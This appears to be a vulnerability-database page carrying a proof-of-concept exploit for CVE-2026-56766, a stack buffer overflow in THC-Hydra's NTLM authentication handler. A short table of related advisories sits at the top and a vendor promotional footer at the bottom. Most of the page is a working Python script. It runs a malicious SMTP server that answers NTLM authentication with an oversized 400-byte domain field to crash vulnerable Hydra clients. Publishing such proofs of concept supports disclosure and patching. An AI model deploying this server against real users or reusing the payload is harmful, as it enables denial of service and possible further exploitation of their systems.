| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2026-56766 | 25 Jun 202618:01 | β | attackerkb | |
| CVE-2026-56766 | 25 Jun 202623:34 | β | circl | |
| CVE-2026-56766 | 25 Jun 202618:01 | β | cve | |
| CVE-2026-56766 Hydra - Stack Buffer Overflow in NTLM Authentication Handler | 25 Jun 202618:01 | β | cvelist | |
| Hydra - Stack Buffer Overflow | 7 Jul 202600:00 | β | exploitdb | |
| EUVD-2026-39515 | 25 Jun 202618:01 | β | euvd | |
| CVE-2026-56766 | 25 Jun 202619:16 | β | nvd | |
| hydra-9.7+git20.gbccaea1-1.1 on GA media (moderate) | 28 Jun 202600:00 | β | opensuse | |
| OPENSUSE-SU-2026:11131-1 hydra-9.7+git20.gbccaea1-1.1 on GA media | 27 Jun 202600:00 | β | osv | |
| UBUNTU-CVE-2026-56766 | 25 Jun 202619:16 | β | osv |
# Exploit Title: Hydra - Stack Buffer Overflow
# CVE: CVE-2026-56766
# Date: 2026-06-26
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://github.com/vanhauser-thc/thc-hydra
# Software Link: https://github.com/vanhauser-thc/thc-hydra
# Affected: Hydra <= 9.7
# Tested on: Hydra 9.5 (Ubuntu 22.04)
# Category: Remote
# Platform: Linux
# Exploit Type: Stack Buffer Overflow
# CVSS: 7.5
# Description: Malicious NTLM Type-2 challenge with excessively long domain
# causes stack buffer overflow in Hydra's NTLM authentication handler
# (SMTP, POP3, IMAP, etc. modules).
# Fixed in: https://github.com/vanhauser-thc/thc-hydra/commit/9cc84c20e75f5fef6bb1790bb9ada2afad2204e2
# Usage:
# python3 exploit.py
#
# Examples:
# python3 exploit.py
#
# Notes:
# β’ Run this PoC server first, then launch vulnerable Hydra against it.
# β’ Triggers SIGSEGV in vulnerable versions.
#
# How to Use
#
# Step 1: Run the exploit server: python3 exploit.py
# Step 2: Run Hydra: hydra -l test -p test 127.0.0.1 smtp
def banner():
print(r"""
ββββββββ ββββββ ββββ ββββββ βββ ββββββ ββββ ββββββββββββββββββββ
ββββββββββββββββββββββ βββββββ βββββββββββββββββ βββββββββββββββββββββ
βββββββββββββββββββββββ βββ βββββββ βββββββββββββββββββββββββ ββββββββ
βββββββββββββββββββββββββββ βββββ βββββββββββββββββββββββββ ββββββββ
ββββββββββββ ββββββ ββββββ βββ βββ ββββββ βββ ββββββββββββββ βββ
βββββββ βββ ββββββ βββββ βββ βββ ββββββ ββββββββββββββ βββ
βββ Banyamer Security βββ
""")
import socket
import base64
import struct
import threading
import time
import sys
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_TYPE_2 = 2
def create_ntlm_type2_challenge():
challenge = bytearray(NTLMSSP_SIGNATURE)
challenge += struct.pack("<I", NTLM_TYPE_2)
domain_name = b"A" * 400
domain_len = len(domain_name)
flags = 0x00008201
server_challenge = b"\x11\x22\x33\x44\x55\x66\x77\x88"
reserved = b"\x00" * 8
target_name_offset = 48
challenge += struct.pack("<HHI", domain_len, domain_len, target_name_offset)
challenge += struct.pack("<I", flags)
challenge += server_challenge
challenge += reserved
challenge += b"\x00" * 8
challenge += domain_name
return challenge
class SMTPServer:
def __init__(self, host='0.0.0.0', port=2525):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def handle_client(self, client, addr):
client.send(b"220 poc-smtp-server ESMTP Ready\r\n")
while True:
try:
data = client.recv(4096).decode('utf-8', errors='ignore').strip()
if not data:
break
if data.upper().startswith("EHLO") or data.upper().startswith("HELO"):
client.send(b"250-OK\r\n250 AUTH NTLM\r\n")
elif data.upper().startswith("AUTH NTLM"):
client.send(b"334 NTLM\r\n")
elif len(data) > 10:
type2 = create_ntlm_type2_challenge()
b64_type2 = base64.b64encode(type2).decode('ascii')
client.send(f"334 {b64_type2}\r\n".encode())
time.sleep(1)
client.recv(8192)
client.send(b"235 Authentication successful (fake)\r\n")
break
elif data.upper().startswith("QUIT"):
client.send(b"221 Bye\r\n")
break
except:
break
client.close()
def start(self):
self.sock.bind((self.host, self.port))
self.sock.listen(5)
print(f"[+] Malicious SMTP server listening on {self.host}:{self.port}")
print("[+] Run: hydra -l test -p test 127.0.0.1 smtp")
while True:
client, addr = self.sock.accept()
threading.Thread(target=self.handle_client, args=(client, addr), daemon=True).start()
if __name__ == "__main__":
banner()
try:
server = SMTPServer()
server.start()
except KeyboardInterrupt:
print("\n[+] Server stopped")
except Exception as e:
print(f"[-] Error: {e}")Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation